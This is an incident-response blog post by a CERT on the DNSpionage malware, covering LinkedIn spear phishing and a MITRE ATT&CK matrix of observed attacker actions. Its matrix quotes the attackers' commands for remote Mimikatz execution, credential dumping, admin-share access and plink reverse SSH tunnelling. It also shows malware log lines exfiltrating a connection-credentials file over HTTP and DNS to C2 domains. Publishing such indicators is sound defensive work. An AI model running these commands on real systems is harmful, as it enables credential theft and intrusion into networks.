Logo Openminded




I have an incident I have an incident

You can download our PGP key to send us your encrypted data via the following information.


@mail : rf.dmpo@trec

Phone : +33(0)




Recently, we had an incident response involving the malware DNSPIONAGE.

At CERT-OPMD, we thought it would be interesting to share our observations.

Mainly, we could observe quietly common actions and tools as described in infography below.


In this blogpost, we will not describe and analyse again the dropper, because Talos did a great job here : https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html

But we will focus in a way on what they could not have seen with their telemetry, and what we could have seen during our investigation.

The screenshot above is what we are talking about here.

Talos observed two domains during the analysis :

  • hr-suncor[.]com
  • hr-wipro[.]com

And they did obtained the “Suncor” dropper.

During investigation we were targeted by Wipro document (cf. screenshot below):

Some Google reverted search on image, shows us where the attackers get this image below (spoiler: on legit wipro.com website, see screenshot below).

Ok, so now we are aware that they wanted to do some really advanced spear phishing.

During our investigation, we had the chance to speak with very comprehensive users, who remembered weird things that happened to them.

He remembered he was speaking with a HR from Wipro on linkedin for few days before the attack.

We hid the identity of the linkedin account because we are assuming it’s a real person behind it, whom may have it’s account stolen. 


“Hopefully”, the users infected were technical IT guys, so it was easy to be understood by them while talking about “phishing”, “spear phishing via social media”, etc.

We hope these datas will help you to understand how DNSPIONAGE infects people



Now, we will describe the lateral movement we observed during the Incident Response.

We observed some very “usual” phases in this case : a preparation phase to perform the whole attack (domain registration, and so on), a delivery phase (with social engineering through professional social media), an installation and a C&C phase (where the malware is dropped, and the macro used for dropping creates a scheduled task).

Then we observed the adversaries performing directory listing through batch files:

  • dir /s /a C:\ 2>&1    (from C: to Z:)

These results were exfiltrated through HTTP to the C&C, to perform some analysis. Because the actions we observed next are file copying and specific files exfiltrations, like a file containing the backup’s configuration. We assumed it was used then to map the network “passively”.

After having the hostnames informations, adversaries performed some discovery using microsoft tools, including network discovery, software discovery, shares discovery,etc. :

  • wmic logicaldisk get name
  • net group \ »domain admins\ » /domain
  • ping -n 1 -a IP
  • net use \\\\HOSTNAME\\c$ /user:\ »DOMAIN\\USERNAME\ » \ »PASSWORD\ » 2>&1
  • WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter Path AntiVirusProduct Get /Format:List | more | findstr displayName 2>&1
  • wmic /node:\ »HOSTNAME\ » process call create \« cmd /c powershell -exec bypass import-module c:\\users\\public\\new.ps1;invoke-mimikatz

With all the informations gathered, adversaries could perform some precise lateral movement on critical servers, by installing a putty to make a SSH tunnel in order to perform RDP remotely.

  • echo y | .\\downloads\\plink32.exe -P 443 -C -R -l <login> -pw <password>

The schema below is here for helping understand  DNSPIONAGE’s process in network.

  • Mimikatz : Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks.
  • Off-the-shelf administration software
  • Bitvise WinSSHD : Bitvise WinSSH is an easy-to-use SSH server which includes Secure remote access via console (vt100, xterm and bvterm supported), Secure remote access via GUI (Remote Desktop or WinVNC required).
  • Open source Hacking tools : (https://github.com/Veil-Framework/Veil-Pillage/blob/master/data/PowerSploit/Invoke-Mimikatz.ps1)
  • Custom malware : DNSPIONAGE
  • Putty : to open SSH tunnel in order to gain RDP access on internal assets

In order to understand the entire behavior of the attackers, from the initial access to data exfiltration, we created a matrix to reconstruct the entire TTP of the attackers.

We based our matrix on Mitres’s work ; MITRE ATT&CK™ is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. So we cut out all the phases of the actions taken by the attackers, so any analysts or researchers could understand and remedy this situation if they came to meet her.

MITRE ATT&CK phases Technics IOC Comments Observations
Initial Access
Spearphishing via Service
https://fr[.]linkedin[.]com/in/XXXXXXXXXX HR consultant spoke with targets for weeks thourgh linkedin before delivering spearphishing link
Spearphishing Link
Windows Management Instrumentation
wmic /node:\ »USER\ » /user:\ »DOMAIN\\USERNAME\ » /password:PASSWORD process call create \ »cmd /c echoy y | .\\Downloads\\plink32.exe -P 443 -C -R -l <login>-pw <password>\ » Command Failed but was used three times
Downloads\\bat_file_46583.bat Using custom batch files to script actions (script directory listing, script copy of ps1 tools to many other assets) Example next case C:\\Users\\USERNAME\\.oracleServices>CHCP 65001 \r\n\r\nC:\\Users\\USERNAME\\.oracleServices>copy .\\Downloads\\new.ps1 \\\\HOSTNAME\\c$\\users\\public\\ 2>&1 \r\n 1 file(s) copied.\r\n\r\nC:\\Users\\USERNAME\\.oracleServices>copy .\\Downloads\\new.ps1 \\\\HOSTNAME\\c$\\users\\public\\ 2>&1 \r\n 1 file(s)
Command-Line Interface
wmic /node:\ »HOSTNAME\ » process call create \ »cmd /c powershell -exec bypass import-module c:\\users\\public\\new.ps1;invoke-mimikatz Using cmd to call powershell with « -exec bypass » args
wmic /node:\ »HOSTNAME\ » process call create \ »cmd /c powershell -exec bypass import-module c:\\users\\public\\new.ps1;invoke-mimikatz Using powershell with « -exec bypass » args to launch mimikatz
Persistance Scheduled Task
Set service = CreateObject (schedule.service)
regInfo.Description = « chromium updater v 37.5.0 »
regInfo.Author = « Google Inc. »
Observed in dropper’s macro
Defense Evasion File Deletion
del .\\Downloads\\bat_file_46583.bat After using a custom .bat downloaded from C2, attackers deleted it immediately
Credential Access Credential Dumping
sekurlsa::logonpasswords Includes Script from https://github.com/Veil-Framework/Veil-Pillage/blob/master/data/PowerSploit/Invoke-Mimikatz.ps1 Mimikatz Version : mimikatz 2.0 alpha (x64) release \ »Kiwi en C\ » (Feb 16 2015 22:15:28)
System Information Discovery (T1082) echo %username%, i : -4000, t : -1, k : 0 | hostname i : -5000, t : -1, k : 0 | systeminfo | findstr /B /C:\ »Domain\ » i : -6000, t : -1, k : 0 Get detailed information about the the operating system
Permission Groups Discovery
net group \ »domain admins\ » /domain
Query Registry
reg query \ »HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\ Get Remote Connection details from user
File and Directory Discovery
dir /s /a C:\ 2>&1
dir \\\\HOSTNAME\\c$ 2>&1
Use batchs scripts to perform directory discovery locally or remotely
Windows Admin Shares
net use \\\\HOSTNAME\\c$ /user:\ »DOMAIN\\USERNAME\ » \ »PASSWORD\ » 2>&1 Try to remotely access to networked system
Remote System Discovery
ping -n 1 -a IP Try to know if IP is up
Security Software Discovery
WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter Path AntiVirusProduct Get /Format:List | more | findstr displayName 2>&1 Adversaries attempt to get a listing of security softwares
System Network Configuration Discovery
ipconfig /all Get detailed of network configuration from host
System Information Discovery
wmic logicaldisk get name List all logical and physical drives
Lateral Movement
Remote Desktop Protocol
echo y | .\\downloads\\plink32.exe -P 443 -C -R -l <login> -pw <password> Using plink32 to open an SSH tunnel to perform remote RDP
Remote File Copy
copy .\\Downloads\\new.ps1 \\\\HOSTNAME\\c$\\users\\public\\ 2>&1 Using remote copy to push files used for lateral movement,like new.ps1 (mimikatz)
Collection Data from Local System
« ull »: « /Client/Upload »,
« dl »: [],
« ul »: [« d:\\mRemoteNG-IMFO\\confCons.xml »]
Exfiltration Exfiltration Over Command and Control Channel
« ull »: « /Client/Upload »,
[Message] uploading files form
In log.txt we can observe the json orders, including the « Upload » orders and Upload URL
Command and control
Commonly Used Port
Port 80 HTTP for C2
Port 443 for SSH Tunnel
Standard Application Layer Protocol
Data Encoding
[Message] send command result dns length:63
[Message] hSfAGJRFIAJHGGWU6S[…]0.0ffice36o.com
[Message] umCGGJRFI[…]0.0ffice36o.com
[Message] 6L6yGJRFIA2[…]0.0ffice36o.com
Base32 to encode DNS messages
Multiband Communication
[Message] config file found!
[Message] current directory set to C:\Users\USERNAME\.oracleServices\
[Message] entering normal mode[Message] get command with dns
Malware can change mode into HTTP mode or DNS mode to exfiltrate datas
Remote File Copy
« dl »: [« /Client/Download/LXqaYRoxoPYNOwjfDadLJAExtjgZYBunvJFwoEohVXJvK »], Malware downloaded batchs scripts or ps1 scripts to perform actions.



During the investigation we were able to trace a number of IP addresses used by the attackers. We find both the IP that hosted the C2, the IP that served for the RDP connection, and so on :

IPs Use Used for RDP *.0ffice36o[.]com *.0ffice36o[.]com *.0ffice36o[.]com *.0ffice36o[.]com HTTP Server for C2


By performing some passive DNS resolution from hr-wipro[.]com (the dropper delivery domain) and hr-suncor[.]com (observed by Talos) we could observe the following domains/IP :


hr-wipro[.]com hr-suncor[.]com


After compromising the first victim, the main goal of the attackers is to perform some lateral movement in order to have better access to more sensitive datas and/or assets :

  • They first tried to use mimikatz remotely on several servers (which triggered our SOC alert). “Hopefully” it seems they only used sekurlsa::logonpassword and they did not create some golden or silver tickets.
  • Mimikatz was not really efficient, but they could already execute some arbitrary code remotely.
    • So they decided to copy plink32.exe – a putty like – on several assets. (sha256sum:3984ae8dd6df1196211232eb56393a4ce3a330508c5862c38ea3b8faf8048072)
    • Execute plink32.exe to create a tunnel in order to perform remote RDP on assets. (echo y | .\\downloads\\plink32.exe -P 443 -C -R -l <login> -pw <password>)
    • By using RDP, it was easier for them to access to databases servers and to identify other critical asset


We were very lucky during the investigation : the attackers performed a lot of errors that helped us to investigate easily, and to give us some very precise indicators on how they perform the requests.

So, we  hope this article will help you investigating internally if you  may have been targeted by DNSPIONAGE.